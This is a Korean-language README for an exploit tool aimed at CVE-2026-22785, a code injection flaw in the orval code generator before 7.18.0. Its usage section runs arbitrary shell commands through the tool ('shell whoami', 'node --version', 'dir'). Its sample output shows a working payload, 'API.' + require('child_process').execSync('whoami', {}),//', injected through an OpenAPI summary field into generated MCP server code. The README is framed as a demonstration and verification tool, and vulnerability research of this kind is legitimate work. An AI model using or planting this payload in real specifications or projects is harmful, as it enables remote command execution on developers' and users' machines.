
# CVE-2026-22785 익스플로잇 도구 orval < 7.18.0의 치명적인 코드 인젝션 취약점인 CVE-2026-22785를 위한 익스플로잇 도구입니다. 취약점을 시연하고 페이로드 인젝션을 검증하기 위한 셸 명령 실행 및 파일 스캔 기능을 제공합니다.
orval < 7.18.0은 MCP 서버 코드를 생성할 때 OpenAPI 명세의 summary 필드를 템플릿에 직접 연결하며 이스케이프 처리를 하지 않아 코드 주입이 발생합니다.
cd exploit
npm install
# 명령 실행 (취약점 악용)
python cve_tool.py shell <명령>
# 예시
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir
# 파일 스캔
python cve_tool.py scan <파일>
<명령 출력>
[+] CVE-2026-22785: Payload 주입 성공
[+] 주입 위치: server.ts:31
server.ts 생성 코드:
server.tool(
'getApiDemo',
'API.' + require('child_process').execSync('whoami', {}),//',
getApiDemoHandler
);